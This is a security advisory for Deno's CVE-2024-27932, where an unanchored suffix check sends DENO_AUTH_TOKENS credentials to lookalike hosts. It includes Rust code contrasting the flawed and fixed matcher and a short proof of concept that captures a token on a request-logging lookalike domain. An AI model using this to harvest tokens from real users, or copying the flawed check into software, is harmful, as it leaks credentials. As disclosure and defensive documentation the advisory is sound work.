Deno's improper suffix match testing for DENO_AUTH_TOKENS
Summary
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.
Details
auth_tokens.rs uses a simple ends_with check on the hostname, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens, because the suffix comparison is not anchored at a label boundary (a leading dot or the start of the hostname).
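The following is an added example, not Deno's own code: it models how a DENO_AUTH_TOKENS-style value ("token@host;token@host") is matched against an import specifier's host, first with the naive suffix check the advisory describes and then with a label-boundary check, so the over-match is visible side by side with the fix. The function names, the token-list parser and the sample values are assumptions made for this illustration.

```rust
// Added example (not Deno's own code): models how a token list like
// DENO_AUTH_TOKENS="token@host;token@host" is matched against an import
// specifier's host, first with the naive suffix check described in the
// advisory and then with a label-boundary check.

/// Naive check: the flawed behaviour the advisory describes.
/// "notexample.com" ends with "example.com", so it wrongly matches.
fn host_matches_naive(specifier_host: &str, token_host: &str) -> bool {
    specifier_host.ends_with(token_host)
}

/// Label-boundary check: exact match, or a match that begins right after a
/// dot, so only real subdomains of the token host qualify.
fn host_matches(specifier_host: &str, token_host: &str) -> bool {
    let s = specifier_host.to_ascii_lowercase();
    let t = token_host.to_ascii_lowercase();
    s == t || s.strip_suffix(&t).is_some_and(|rest| rest.ends_with('.'))
}

/// Pick the token to send for `specifier_host` from a DENO_AUTH_TOKENS-style
/// value ("token@host;token@host"), using the supplied matcher.
/// Entries without '@' are ignored. First match wins.
fn select_token<'a>(
    tokens_env: &'a str,
    specifier_host: &str,
    matches: fn(&str, &str) -> bool,
) -> Option<&'a str> {
    tokens_env
        .split(';')
        .filter_map(|entry| entry.split_once('@'))
        .find(|(_, host)| matches(specifier_host, host))
        .map(|(token, _)| token)
}

fn main() {
    // Constructed sample value, modelled on the advisory's PoC.
    let env = "a1b2c3d4e5f6@poc.example.com";
    for host in ["poc.example.com", "sub.poc.example.com", "denovulnpoc.example.com"] {
        println!(
            "{host}: naive={:?} fixed={:?}",
            select_token(env, host, host_matches_naive),
            select_token(env, host, host_matches)
        );
    }
}
```

With the naive matcher the token leaks to denovulnpoc.example.com; with the label-boundary matcher only poc.example.com and its subdomains receive it.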
PoC
1. Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
2. Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
3. Observe that the token intended only for the truncated domain is sent to the full domain.
Impact
Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected: a token scoped to one host can be sent to any host whose name merely ends with the same characters.
References
- https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89
- https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b
- https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr
- https://nvd.nist.gov/vuln/detail/CVE-2024-27932
- https://github.com/advisories/GHSA-5frw-4rwq-xhcr